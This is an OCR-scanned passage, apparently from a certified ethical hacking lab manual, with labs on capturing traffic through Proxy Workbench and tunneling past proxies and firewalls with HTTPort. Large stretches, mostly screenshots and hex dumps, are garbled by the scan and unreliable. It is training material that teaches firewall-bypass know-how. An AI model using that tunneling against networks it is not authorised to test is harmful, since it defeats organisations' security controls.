000032 /I . 1. .User—Agent 2f 31 2e 31 Od 0 A SS 73000048 : Mozilla/5.0 (¥ 3a 20 4d S i 7a 69 6c 6c000064 indows NT 6.2; V 69 6e 64 6 £ 77 73 20 4e000080 OU64; rv:14.0) G 4 f 57 36 34 3b 20 72 76000096 ecko/20100101 Fi 65 63 6b 6f 2f 32 30 31000112 refox/14.0.1..Pr ?2 b5 66 6f 78 2f 31 34000128 oxy-Connection: 6f 73 79 2d 43 6f 60 6e000144 koop-alivo. Host 6b 65 65 70 2d 61 6c 69000160 : mail.google.co 3a 20 6d 61 69 6c 2e 67 ,000176 m . . . . 6d Od Qa Od 0a< III >
7angwrrx?n— Luyymy. un ; 1.un ; 1 iciu ic . un ; 11Memory: 95 KByte Sockets: 1 CO Events: 754
F IG U R E 13.6: P ro x v W o rk b en ch m ain w in d o w
1 4 . G o t o Tools o n d ie t o o lb a r , a n d s e le c t Configure Ports
S T h e even ts p an e l d isp lays th e to ta l n u m b er o f e ve n ts th a t P ro x y W o rk b e n ch has in m em o ry. B y c le a rin g th e d a ta (F ile ־ > C le a r A ll D a ta ) th is w ill d ecrease to ze ro i f th e re a re n o co n n ec tio n s th a t are A liv e
& The last panel d isplays the current tim e as reported by your operating system
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 215
M odule 03 - S can n in g N e tw o rk s
Proxy Workbench
U- 3L^oolsJ Help
Save Data...
=tails for All Activity m n ih m|10m | T 0 I Protocol | Started ^
Configure Ports.
173.194.36.24:80 (w»w*.g.. HTTP 18:23:39.3}74.125.31.106:80 |pt 4ao HTTP 18:23:59.0־173.194 36.21:443 (naig. HTTP 18:24:50.6(173.194 36.21:443 (na*g HTTP 18:24:59.8'173.194 36 21:443 (naig HTTP 18:25:08.9־
17׳n *־c ול־ ״*n ו*י׳ו « HTTP ■ m -w ip r
127.0.0.1 J127.0.0.1 tJ
127.0.0.1 3d127.0.0.1 J£127.0.0.1 jd;
R19115־-l1?7nn1>
File View I
5
Monitoring: W
All Activity
5119951201
512035120551207
Failure Simulation...
^ SMTF Real Time 9 ־י099יח •
POPd Options...k # HTTP T־־TWny TTWU(WW) ^ HTTPS Proxy • Secure Web |443)^ FTP • File T ransler Protocol (21)
Pass Through ■ For Testing Apps (1000)
Real time data for All Activity
0a 55 73 69 6c 6c ?3 20 4e 20 72 76 32 30 31 2f 31 34 6f 6e 6e 61 6c 69 6c 2e 67
31 Od 6f 7a 6f 77 34 3b 6£ 2f 6£ 78 2d 43 70 2d 61 69 Od 0a
2f 31 2e 3a 20 4d 69 be 64 4f 57 36 65 b3 6b 72 65 66 6f ?8 79 6b b5 65 3a 20 6d 6d Od 0a
/ l.1..User-Agent : Mozilla/5.0 (W indows NT 6.2; U OU64; rv :14.0) G ecko/20100101 Fi refox/14.0.1. Pr oxy-Connection: keep-alive..Host : mail.google.co m. . . .
000032000048000064000080000096000112000128000144000160000176
I eiiim a ic UII 11c1u4c. uu unuuic u i i L׳«ty1c un 1_<.yymy. un ׳ j u iMemory: 95 KByte Sockets: 100 Events: 754
F IG U R E 13.7: P ro x y W o rkb en ch C o n F IG U R E Po rts op tion
1 5 . 111 d ie Configure Proxy W orkbench w iz a r d , s e le c t 8080 HTTP Proxy - Webi i i d i e l e f t p a n e o f Ports to lis ten on.
1 6 . C h e c k HTTP 111 d i e l i g h t p a n e o f p r o t o c o l a s s ig n e d t o p o r t 8 0 8 0 , a n d c l i c k
Configure HTTP fo r port 8080
Configure Proxy Workbench
Protocol assigned to port 8080
Proxy Ports
Ports to listen on:
Don't use>> ;✓ ■ :
Pass Through □ HTTPS
□ POP3 FTP ח
Port [ Description25u n
SMTP • Outgoing e-mailPHP3 - lnnnmino ft-maiI
18080 HTTP Proxy ■Web443 HTTPS Proxy ־ Secure Web21 FTP ־ File Transfer Protocol1000 Pass Through ■ Foe Testing Apps
& d d - | Qetete | | Configure H T T P tor poet 8080. |
CloseW Sho^ this screen at startup
F IG U R E 13.8: P ro s y W o rkb en ch C o n fig u rin g H T T P fo r P o rt 8080
1 7 . T h e HTTP Properties w i n d o w a p p e a r s . N o w c h e c k Connect via another proxy, e n te r y o u r W indows Server 2003 v i r t u a l m a c h in e I P a d d re s s i n
Proxy Server, a n d e n te r 8080 i n P o r t a n d d i e n c l i c k OK
& The *Show the real tim e data w indow ' a llows the user to specify w hether the real-tim e data pane should be displayed o r not
C Ll P e o p le w h o b e n e fit fro m P ro x y W o rk b e n ch
Home users who have taken the first step in understanding the Internet and are starting to ask "Bat how does it work?”
People who are curious about how their web browser, email client or FTP client communicates w ith the Internet.
People who are concerned about malicious programs sending sensitive information out in to the Internet. The information that programs are sending can be readily identified.
Internet software developers who are writing programs to existing protocols. Software development for die Internet is often verv complex especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems.
Internet software developers who are creating new protocols and developing the eluent and server software simultaneously. Proxy Workbench w ill help identify non-compliant protocol
: - T-1- ■>
Internet Security experts will benefit from seeing the data flowing in real-time This wiH help them see who is doing what and when
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 216
M odule 03 - S can n in g N e tw o rk s
^ M a n y p e o p le u n d e rstan d so cke ts m u ch b e tte r th e n th e y th in k . W h e n yo u s u rf th e w e b an d go to a w e b s ite ca lle d w w w a lta v is ta .co m , y o u are a c tu a lly d ire c tin g y o u r w e b b ro w se r to o p en a so cke t co n n e c tio n to th e se rve r ca lled" w w w .a lta v ia ta .co m " w ith p o rt n u m b er 80
F IG U R E 13.9: P ro s y W o rkb en ch H T T P fo r P o rt 8080
1 8 . C l i c k Close i n d ie Configure Proxy W orkbench w iz a r d a f t e r c o m p le t i n g d ie
configuration settings
T h e re a l tim e log g in g a llo w s yo u to re co rd e ve ry th in g P ro x y W o rk b e n ch d oes to a tex t file . T h is a llo w s th e in fo rm a tio n to be re ad ily im p o rte d in a sp read sh eet o r d atab ase so th a t th e m o st ad van ced an a lys is can b e p e rfo rm e d o n th e data
1 9 . R e p e a t d ie c o n f i g u r a t i o n s te p s o f P r o x y W o r k b e n c h f r o m Step 1 1 to Step 1 5 i n W in d o w s S e r v e r 2 0 0 8 V i r t u a l M a c h in e s .
Configure Proxy Workbench
Protocol assigned to port 8080
□ < Don't use>____________
□ Pass Through□ HTTPS□ POP3
Configure HTTP for port 8080
Proxy Ports
3orts to listen on:
Port | DescriptionSMTP • Outgoing e-mail POP3 ־ Incoming e-mail
HTTPS Proxy-Secure Web FTP ־ File Transfer Protocol
deleteAdd
Close
251108080 HTTP Proxy - Web443211000 Pass Through - For T esting Apps □ F T P
W Show this screen at startup
F IG U R E 13.10: P ro x v W o rkb en ch C o n fig u red p roxy
HTTP Properties
General
C On the web server, connect to port:
(• Connect via another proxy
Proxy server |10.0.0.7|
Port: Iftfififi
CancelOK
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 217
M odule 03 - S can n in g N e tw o rk s
2 0 . 111 W indows Server 2008 t y p e d ie I P a d d re s s o f W in d o w s 7 V i r t u a l
M a c h in e .
2 1 . O p e n a Firefox b r o w s e r i n W indows Server 2008 a n d b r o w s e w e b p a g e s .
2 2 . P r o x y W o r k b e n c h G e n e r a te s d i e t r a f f i c w i l l b e g e n e r a te d a s s h o w n i n d ie
f o l l o w i n g f ig u r e o f W indows Server 2008
2 3 . C h e c k d ie To C o lu m n ; i t is f o r w a r d i n g d ie t r a f f i c t o 10.0.0.3 ( W in d o w s
S e r v e r 2 0 0 8 v i r t u a l M a c h in e ) .
Mcnfanj MN1r2CiU ׳;־.43110 0 0 2|
A ־=-׳•»־־ U KCV9►*. ■ * 1 5 7 * « V13r>M4ca1facc tWJ> ?׳•>״ SfwAcwirw* 1556*׳*r» 9 rM 0 (a < rM ו . מ נ 'V**►—* 1191 * ״■'— •*«*►•*(»׳•< 2110
IV*3(95IVJ3J41
; v » » . < * < * 1 1 9 9 . * ״ inh■■ <»(a a 1»1•״ ׳
PAthtf<ka»Mcc••י• »-•׳»(*-.«►FV»9hn<*co<na<t
06.K2S.31T06 052? סט
06 052C 92? 06®274B
מ ? *052 06utre^rwKKrTK052CTO «®27ug 06052706 Krez'S) acr.rte 06 052:7 W> HB700;05יי«י»0 6 » 2 7 »0e « 2? 5ae06052»»l
1T\CV*3hM41«x>«dt 1120
06052*173sauszst£ SIS :4?
06 052• 3י5
«105זמ.גג43&25 05»
« 052*100 «05 261E ®0526217 K.W263Kte«it *1 « 05 26 IK tiiir, :1 iw. (6 05 26 734 nn:119,
«0$27נ«(*0127 104»0J2n0114,0127 ;71 m <k 27 411 (6 052743( C60127M•(6 05 27 597 (6052702
££05נ7ט306 05275S7
wMuon144a laccc *0010041 laaaixzo 1000 )»# Mtaiaon 1444 ]•cto10011 )**a14441400 *00 )•CM 14441«cm 1404 HCW 1400 )■IB 144a IKM 1400 )•CM 144a m e 1444 ItOM 140a1«:w 144 a 1 ta t1000 )acta1444 laQHl 144a 14CM lOOQlKW
0ל7vr.u ׳ 1> י- *liraנ^י1*f J•' *J י־ 1J נ- il »־: u»־.
41• •I.. < 1 י <1 נ 11• ■ י 11 נ־:. *.U • 1 נ
1—2
| £4AOT*!>^ SHIP 0.*!>> ן ו\«*>«׳1מ 1 CQC•) ■l ff»-0 r»IH1(l I.(flf f:iilffllW'/tilHIUII
y HT IR F W - S.oi» W.6 (4431 6 FIP Hori^ra *<X0:d|71)V p*m (110*i!-f« r»»nj A«c*no301
Sf <420 «( 30 II
31 ro 0נ 4c (1 7i ?2 W 2c32 3d 3» (3 U K 3d 41 »7 (3 74 (145 M H
31 30 32 20 •0 41 ;4 u
>> 20 38 640? 10 30 04 Qo 13 tl
20 «d 61 7ab I «m Cm ?.(
4c 61 6י 7*
20 10 30 78 70 63 4d £1 72 39 30 47
66 6י 6574 20 32 47 I J 64 t l Ic 3a Od 0 . M ל0 4345
31 0M4S 1 •0 17 34 a n« 45 26 a0M&4 Extern Sot10 [CSC «::>*€1112)10 0 w *>:
3C 000160 0174 00 ׳[141»t 0׳1?2
52 00 S . . : : i la ir 1u . - 1u 4י
0 23 .t t i r t F r i c» 2*1 י '.0 10 <4
3 n :*dta-Caat> 0«3:>o: .ji-age
F IG U R E 13.11: P ro x y W o ik b e n ch G enerated T ra ffic in W in d o w s Server 2012 H o s t M ach in e
2 4 . N o w l o g i n i n t o W indows Server 2008 V i r t u a l M a c h in e , a n d c h e c k d ie To c o lu m n ; i t is f o r w a r d i n g d ie t r a f f i c t o 10.0.0.7 ( W in d o w s 7 V i r t u a l
M a c h in e ) .
Fife View Tod* Hrip
M irilcrrfj וי•׳ hin i'iii/'l 3 |1000 3| !'*!41. 1 ׳ ■IT IF* F'1t»v • W<*b(>]CH])
d
fm■ 1 su w i1״ .•f 11 *!י׳ K^d¥)006«ff)ft 1000701 CO HTTP 061B33 750 0T) tB 40 !00 F£J10.00.6»10 1a0.a?;8D80 H IIP 06.05 40109 06tt»41156 KjtJ':a:fc3114 lQ0D7-mm HUP Q 3 B9U. (h 41 070׳>־0! 40 F£ J'].0 0.6 9015 1aoa7.83E0 HTTP 06.(E « 375 03 00.41.625 F£ J6 ; 0 : snt־ ו00 07שנט: HITP (£06 41437 0,0141 ms F£J10 0 0 6 9819 1Q0 07:83 EO HTTP 0606 *3 531 05 05 41 281 F£h!0a.6 9820 1ao.a?;83a1 HUP 06.05 « 546 06.0541.281 Fjh J'I 0 0.&9B22 1aoa7!ffiEa HUP 05<E 40 578 (E05 40Bt3 F£1100169824 1a0.a7:83EO HTTP 06:0=4:655 06 05:41.828 F£110 00 69826 1Q0a7:fflffl HTTP 06 05*3 906 (K OS 41 593 F£1100069828 1000.7:8303 HTTP 06<e 41015 06 05 41 406 F£1*100.6 9830 1a0.Q7.83EO HTTP 06.0C 41 *09 06 05 41 718 F£110 0 0 &9H32 mon7rmgo H1IP (KtR 41 TIB as 05 41 11 Fj*1 1 2J
$ AMr/M|y^ ,iM TP • Outguny ••fr«l(25|POP3 •lr«Mfiin3 0n»iir1C1Qwpnmamm■H 1QOQ2I0 1QQQ7
& mo 0.6 to 10 0.0 7HT1P5 Ro«v -Seojic Web(4431 "W FrP-Fielienifei Ftolord |211 • Nol Lit*
PdssThioj^i F01 Tastro^o*nOOOl fJ
a? פ
fted cMs Foi Hr TP Piceay • V/H3 |B0B]|20 S3 i l 74 31 20 30 30 3a ic 6 1 73 74 .?rf 7 2 b'3 2c 20 3230 31 .32 30 3י63 b0 65 2d ■43 2d 61 6? 65 3d 63 74 t ' ) bl 6• 65 Od 0o Od 0o
76 70 69 72 65 73 3a4d 61 72 20 32 30 3139 20 47 Id S4 0d 0466 69 6S 64 20 1674 20 32 30 30 39 2047 4d J J G« <3 616t 6c 30 20 fd 61 78Od 0 9 43 61 6« 60 6565 70 2d 61 (c ל6 69
SxpiroD Sot 26IUr 2011 00 G2<0 CUT hint. Nrd 11 t.wd. f t 1 . 23 0 c t 2009 20•10 04 GMT. . C»cho-Cont
roL max-oge-360 0. Connect ioa k oep-olivc
:1:064010080
־־09* ־06011200012C060144060160060176080192
T»1mnate 01( RcIlbc Qr 'hrb»f־ Cm ^ ׳! CK -oggrg 01( 613AM
6:15 AM
Mar a y 3ES KBylei
J Start | Proxy Worfctxfyh
A i L d
F IG U R E 13.12 P ro x y W o rkb en ch G enerated T ra ffic in W in d o w s Se rve r 2003 V irtu a l M ach in e
& Proxy W orkbench changes th is. Not only is it an awesom e proxy server, but you can see all o f the data flow ing through it, v isua lly display a socke t connection h is tory and save it to HTML
£ 7 A n d n o w , P ro x y W o rk b e n ch in c lu d e s co n n e c tio n fa ilu re s im u la tio n stra teg ies. W h a t th is m eans is th a t yo u can sim u la te a p o o r n e tw o rk , a s lo w In te rn e t o r u n re sp o n s ive se rve r. T h is is m akes it th e d e fin itiv e T C P a p p lica tio n tester
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 218
M odule 03 - S can n in g N e tw o rk s
2 5 . S e le c t O n d ie w e b s e r v e r , c o n n e c t t o port 80 i n W indows 7 v i r t u a l m a c h in e ,
a n d c l i c k OK
-TTTP Properties
General |
(• On the *tcb server, connect to port:
C" Connect vb atoihcr proxy
Pro<y :erver: 110.0.0.5
Port: [fiflffi
OK i l C«r>cd
H I I t a llo w s yo u to 'see ' h o w yo u r e m a il c lie n t co m m u n ica te s w ith th e e m a il s e rve r, h o w w eb pages are d e liv e re d to yo u r b ro w se r an d w h y yo u r F T P c lie n t is n o t co n n ec tin g to its se rve r
F IG U R E 13.13: C o n fig u rin g H T T P p roperties in W in d o w s 7
2 6 . N o w C h e c k d ie t r a f f i c i n 10.0.0.7 ( W in d o w s 7 V i r t u a l M a c h in e ) “ TO” c o l u m n s h o w s t r a f f i c g e n e r a te d f i o m d ie d i f f e r e n t w e b s i te s b r o w s e d i n
W indows Server 2008
" Unix
הו7צ&ו
p i? w a » '*wts c«> »w W d iso
« > »: ® o 11 1► ;>■r * e VWur Toeli Help
DcUI1 taH TTPIW -W «b 180801 m i l ►From :י Pictocoi
I
U s E ^ r l 1 laslSUto B/*5 C25 1 BylesS*010.0 D 32237 <. 26E0 I1 :-.h גן. *.3 ד H UP 06:0634.627 06.05:35.436 FV»B ho? J'.ccrncc•... 1577 0)010 0 0 32239 •571SS22G.aK:£0|adi HTTP 0&£634643 0£<62«3 fVt'B hai d :c fr r« l 1555 0)8100032239 י7820612£«06«*>י * HTTP C6X634S66 06(636390 P*J»3 l « J i « r r « l . . . 1556 0;0100032240 * י9878206126*0*0« HTTP C6:(634$G6 06(635624 f*■״? hasdaxrrecJ... 1950 0)010 0 0 3 2241 1337320612!6c0|ic>*1t.. HTTP 06:C&34.336 060636624 FV>B bn dsO Tiw l״ 1131 0) 0 10 0 0 3 2242 2027921012140 (t*K 1 HTTP ££.0634 S£3 c e c & x 21e Km d : « r r « l 2110 050100032243 י57 iffi 2262(680|**» HTTP 06C636030 (6(636186 447S 0)010003 224( מ 56214311 lOtCImet71c . h i TP C6 (&.X.2l£ 060&355W FWB hat d n c rm l . 2710 0)010 0 0 3 2245 «» :01106 9517<ן>«&4ו HTTP 0fe» 35 4 » CM &XTtS ha* d iffrrw l 1572 112)9100032246 ־ , ׳ ־ • .-• 1 1 -:1 .| . : HI TP 06:0636483 (6 (C! 36 (66 ויי 0)010 cנ 22 0 0 '»ra2D512ew 0a*u HI IP 06C03CW3 (*(CJ&124 11« 0)610 0 0 3229 J0n>206120WI1«ht H UP 06.06 3U6U6 0606J6243 rv>V bm diwriK l... IA» 0) 0 10 0 0 3 224) HTTP flf.r»3570? f f . f f T V W *® K »d n (rr« 1 2ט3 0',W10 0 0 3 2250 1«7820612S8000<ht H U P te a . 56 786 . • > 1183 0)0 10 0 0 3 2251 h i IP 060U363W COOUJCW 1 8 ho d ״י im rM l. 2i03 0)0 1 OOO 322C • קי ן ftfC|v».»w HTTP Cfr»XC7? M hoi d iM rm i .,MS 0M־ 1000 3 2253 828>18 1-Sani2ahb j HTTP C6:0636124 06(636718 ^ I « n l 1a rr« l... 3333 0)0100032254 '»ra20612t<«)BCTht HI TP C6:Cfc 36.166 0606367*9 *יי8 2125 358) 0 10 0 0 3 2255 •3873206126t01icdn.. HI TP 06:0636216 060636611 FVrtJ he! diccrriKl.. 2(21 0)01OOO322S 397920G1;&£C|1־«fce HTTP C£C&36־££ 0&0K36&2? PV.9־hat iice rrcc t.. 1124 0)010 0 0 3 2257 i»78206l260Hiceht־ HTTP C6C636366 06(6368(6 tted2«rr«*... 1120 0)010.0.0.32258 157.1652262660) l«fc HTTP 06. C& 36.606 060637.436 FVjB h s d.ccrrecl... 1533 0
n*Vlet»7naQa7}
_L *a
6 5 ? 0 7 4 2d 4 ־ 6 3 61 ג ־. SO 3a 20 43 50 3d 22 40if ?5 S2 20 42 5? 53 2074 65 3• 20 53 (1 74 2c32 30 31 31 20 30 30 3a?4 011 0a 4 ) ii 6e (e 65&c Cl ?3 65 CJ 0■ 43 i lt>0 67 30 32 20 *3 68 4ל
61 72 75 3a 20 41 63 6364 69 60 6P Od 0a 60 334f i l 20 id 4? 56 61 2055 4e 4? 22 Od 0» 44 6120 32 36 20 4d 61 ?2 203S 32 3a 33 31 20 47 4tJ61 74 6? 6( 6■ 3• 20 6 )60 ?4 65 6a ?4 2d 4c 65
W i 30(« 5et.26 bar 2011 00
?2 31 CUT Conn* ct*oc .iv s * . Co Btwt-Uimh 20
000160000176000192000206000224000240000256000272
f t All«5ctr»*y^ SMT P • Ouiflonfl e ״id |25| K C Ir«m^1*fflalf110l־C־«
peal line dsis is• HTTP P * • / ■ Web (9060)
Cl Cl Cl 3 to 10 0 0 5 ד10003to 203.85.231.83 |m־j.Brc> ’00031# 68 71 209 176 |abc goc 100031a 50 27 06 207 |edn>m)k| 100031a 58.27.86.123 ledge Bus 100031a 68 71 220 165 |abc cm 100031a 202 79 210 121 Ibi.ta* 10003b) 205 128 84.126 100031a 50 27 86 105 |f«*\1ur 100031a 58 27.06.21; I1d1«u.«t> 100031a 157 166 255 216 Mdi c 100031a 157 166 255 31 |r«iv, 100031s 203 85 211 148 lilt 100031a 203 106 85 51 |b kcmc 100031a 50 27 06 225 |s etrrcd 100031a 157.166.226.26 Iwmc 100031a 199 93 62 126 100031a 203.106.85.65 |1pe.<Mr1000310 207 46148 32 !view* 100031a 66 235 130 59 Ix-ffccm 100Q3la 203.106.85.177 Ib.scae 100031a 0 26 207 126 ledn vrtt 100031a 157 166 226 32 |tve±a 100031a 58 27 22 72 |r.«*\tum 100031a 190 70 206 126 |icchk 100031a 157 166 226.46 ledlnr 100031a 66 235 142 24 |rrel1b)< 100031a 203 106 05 176 Idi Mrw1000311 157.166.255.13 Immma 100031a 68 71 209173 |4bc fl0<
ISL
Q2 In theConnection Tree, if a protocol o r a c lien t/server pair is selected, the Details Pane displays the summary inform ation o f all o f the socket connections tha t are in progress for the selected item on the Connection Tree.
F IG U R E 13.14: P ro s y W o rkb en ch G en erated T ra ffic in W in d o w s 7 V irtu a l M ach in e
L a b A n a l y s i s
D o c u m e n t a l l d i e IP addresses, open ports a n d running applications, a n d
p r o t o c o ls y o u d is c o v e r e d d u r i n g d ie la b .
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 219
M odule 03 - S can n in g N e tw o rk s
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
P r o x y W o r k b e n c h
P r o x y s e r v e r U s e d : 1 0 .0 .0 .7
P o r t s c a n n e d : 8 0 8 0
R e s u l t : T r a f f i c c a p t u r e d b y w i n d o w s 7 v i r t u a l
m a c h in e ( 1 0 .0 .0 .7 )
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S
R E L A T E D T O T H I S L A B .
Q u e s t i o n s
1. E x a m in e t h e C o n n e c t i o n F a i lm e - T e r m in a t i o n a n d R e fu s a l .
2 . E v a lu a t e h o w r e a l - t im e l o g g in g r e c o r d s e v e r y t h in g i n P r o x y W o r k b e n c h .
I n t e r n e t C o n n e c t i o n R e q u i r e d
0 Y e s □ N o
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m □ i L a b s
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilAB Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 220
M odule 03 - S can n in g N e tw o rk s
HTTP Tunneling U sing HTTPortH T T P o / f is a program from H T T H o s f that mates a transparent tunnel through a p m x j server orf/renall
L a b S c e n a r i o
A t t a c k e r s a r e a lw a y s i n a h u n t f o r c l i e n t s t h a t c a n b e e a s i ly c o m p r o m i s e d a n d
t h e y c a n e n t e r t h e s e n e t w o r k s w i t h I P s p o o f i n g t o d a m a g e o r s te a l d a ta . T h e
a t t a c k e r c a n g e t p a c k e t s t h r o u g h a f i r e w a l l b y s p o o f i n g d i e I P a d d r e s s . I f
a t t a c k e r s a r e a b le t o c a p t u r e n e t w o r k t r a f f i c , a s y o u h a v e l e a r n e d t o d o i n t h e
p r e v i o u s l a b , t h e y c a n p e r f o r m T r o j a n a t t a c k s , r e g i s t r y a t t a c k s , p a s s w o r d
h i j a c k i n g a t t a c k s , e t c . , w h i c h c a n p r o v e t o b e d is a s t r o u s f o r a n o r g a n i z a t i o n ’ s
n e t w o r k . A n a t t a c k e r m a y u s e a n e t w o r k p r o b e t o c a p t u r e r a w p a c k e t d a ta a n d
t h e n u s e t h i s r a w p a c k e t d a ta t o r e t r i e v e p a c k e t i n f o r m a t i o n s u c h a s s o u r c e a n d
d e s t i n a t i o n I P a d d r e s s , s o u r c e a n d d e s t i n a t i o n p o r t s , f la g s , h e a d e r l e n g t h ,
c h e c k s u m , T i m e t o L i v e ( T I L ) , a n d p r o t o c o l t y p e .
T h e r e f o r e , a s a n e t w o r k a d m i n i s t r a t o r y o u s h o u l d b e a b le t o i d e n t i f y a t t a c k s b y
e x t r a c t i n g i n f o r m a t i o n f r o m c a p t u r e d t r a f f i c s u c h a s s o u r c e a n d d e s t i n a t i o n I P
a d d r e s s e s , p r o t o c o l t y p e , h e a d e r l e n g t h , s o u r c e a n d d e s t i n a t i o n p o r t s , e t c . a n d
c o m p a r e t h e s e d e t a i ls w i t h m o d e l e d a t t a c k s ig n a tu r e s t o d e t e r m in e i f a n a t t a c k
h a s o c c u r r e d . Y o u c a n a ls o c h e c k t h e a t t a c k lo g s f o r t h e l i s t o f a t t a c k s a n d t a k e
e v a s iv e a c t io n s .
A l s o , y o u s h o u ld b e f a m i l i a r w i t h t h e H T T P t u n n e l i n g t e c h n iq u e b y w h i c h y o u
c a n i d e n t i f y a d d i t i o n a l s e c u r i t y r i s k s t h a t m a y n o t b e r e a d i l y v i s i b l e b y
c o n d u c t i n g s im p le n e t w o r k a n d v u l n e r a b i l i t y s c a n n in g a n d d e t e r m in e t h e e x t e n t
t o w h i c h a n e t w o r k I D S c a n i d e n t i f y m a l i c i o u s t r a f f i c w i t h i n a c o m m u n i c a t i o n
c h a n n e l . 111 t h i s l a b y o u w i l l l e a r n H T T P T u n n e l i n g u s in g H T T P o r t .
L a b O b j e c t i v e s
T h i s l a b w i l l s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w t o u s e HTTPort a n d HTTHost
L a b E n v i r o n m e n t
111 d i e la b , v o u n e e d d ie H T T P o r t t o o l .
I C O N K E Y
V a lu a b le
in f o r m a t io n
T e s t v o u r
k n o w le d g e
3 W e b e x e rc is e
Q W o r k b o o k r e v ie w
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 221
M odule 03 - S can n in g N e tw o rk s
■ H T T P o r t i s l o c a t e d a t D:\CEH-Tools\CEHv8 M odule 03 Scanning N etw orks\Tunne ling Tools\HTTPort
■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f HTTPort f r o m d i e l i n k
h t t p : / / w w w . t a 1 g e t e d . o r g /
■ I f y o u d e c id e t o d o w n l o a d t h e l a t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n
t h e la b m i g h t d i f f e r
■ I n s t a l l H T T H o s t o n W indow s Server 2008 V i r t u a l M a c h i n e
■ I n s t a l l H T T P o r t o i l W indows Server 2 0 1 2 H o s t M a c h i n e
■ F o l l o w t h e w i z a r d - d r i v e n i n s t a l l a t i o n s te p s a n d in s ta ll it.
■ A d m in is tra tive p riv ileges is r e q u i r e d t o r u n d i i s t o o l
■ T h i s l a b m i g h t n o t w o r k i f r e m o t e s e r v e r f i l t e r s / b l o c k s H T T P t u n n e l i n g
p a c k e t s
L a b D u r a t i o n
T im e : 2 0 M in u t e s
O verview of HTTPortHTTPort c re a te s a t r a n s p a r e n t t u n n e l i n g t u n n e l d i r o u g h a p r o x y s e r v e r o r f i r e w a l l .
H T T P o r t a l lo w s u s in g a l l s o r ts o f I n t e r n e t S o f t w a r e f r o m b e h in d d ie p r o x y . I t
b y p a s s e s HTTP proxies a n d HTTP, firew a lls , a n d transparent accelerators.
L a b T a s k sB e f o r e r u n n i n g d ie t o o l y o u n e e d t o s t o p IIS Admin Service a n d World Wide Web Publishing services o n W indows Server 2008 v irtua l machine.
G o t o A dm in istra tive Privileges Services IIS Admin Service, r i g h t
c l i c k a n d c l i c k t h e Stop o p t io n .
01 HTTPortcreates a transparent tunnel through a proxy server or firew a ll. This a llow s you to use all sorts o f In ternet so ftw are from behind the proxy.
Stopping IIS Services
2.
£ " Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 222
M odule 03 - S can n in g N e tw o rk s
Ka-n- * I CeKri3bcn | 5:afc_s'*,FurcBon Discovery Provide Host hostcroca.. , Stated
P-rcoco Decovery Resource PJ>lc3ten P-behes t... Started■CC-rOvO Poicy Cent The serve... Started
Key aid Cerbfeate Mens9»trp-t P-o-rde* X...£,h\jma1 :rtc'frc• Devi:• Access E'aolas 9aCfchyMr-v m u txchanoa s w a P0־vd81 a .. . started<|1Hyoer-V Gue»t Shutdown Se׳v»oe fvovdes a .. . Started<£ Hyp*r«V Utatoeat Stive* Va-iton th... 5 hr ted' ,hvsf'-v Tir* Syndvon uaton Save• Syrdvcn j . SUr'tid
V0iuneSh«30WC00VR«UMCDr » ׳X•'־׳ cocfdnjte _ 1urted ‘
£.32 a־־d Au0!:p tPMC *CeyUg Mod Jet Cfe Inter active services Detection
S tJt________ St* lid
4 Internet Cornecton Shwrng CCS) IP helper
£,IPsec PoIcy Agent
P.-llv jn...Res -reR«3rt ! * "
Started . 5 :cited
* JkctR.t1 £>־trbuted Transaction Coordnsso־ v£: AITmks ► 3te , Started^Irtt-tover To»og>• Discovery 1“tepee- --־ 0...?iwicroajft KETFrans0״rk NGB< v3 0.50727_kfr■ Started;*Microsoft .rcrFraroenorkNGei v: 0.50727_>« Proprf br% t .... Stated'■*, M0090* Fb־׳e Channel stfo'Ti Res^Cstcn Se* ..t ־8
wb , ^ן MCT0M*t 6CSI ]ntigtor Service^Vbon*! Software Shacton Copy P'ordfi Wragn «...Q,MoJU Manteimce Save• Th*M00IU..
_ J
IIS Admin Scrvict
Sioo th- service 5.estart thesevce
Docrpton:Enabltc 6 « י11 ־ > « to * d n ־1 v j ! t •־ ::s
׳ יי־ ׳ » : « * « « H5 ׳X 'JtK C»r*ou׳M10n *or ימ« SK*® one FTP 1*rvior* thumvte • ttauprd. :־»i« v«' n׳ il 2* u1«6* to amf g.«« S-—3 or ftp. :, the servce e c jx c «. an,se1/׳׳ee* *v9!t»porv dfpeo; o• * mI fa I tottait.
Stana*.- J ץ ~>t:p jcrvce IL Acrrr StrVtt on LOCO CaiOutt*
F IG U R E 14.1: Sto p p in g I IS A d m in Se rv ice in W in d o w s Se rve r 2008
3 . G o t o Adm in istra tive Privileges Services World Wide Web Publishing Services, r i g h t - c l i c k a n d c l i c k d ie Stop o p t io n .
*te Action jjen KelsN^ltwl רי Ab- IB rrfE f [ > | E
I S « v « « (local)Servwj ClomJ)
v;״ tid Wide Web PwbW-mg SrrvK.1 ־ 1 CwJOCor I S !a w jP1cr>*0M זו...
צ2י ne servceRf*t»r;8י« t t ' t e
SfcvOU'1 S’ Mijs. Coov CfetYea Mar^aoerent Se ce>׳־
MWU0K*...TUtWtbM..
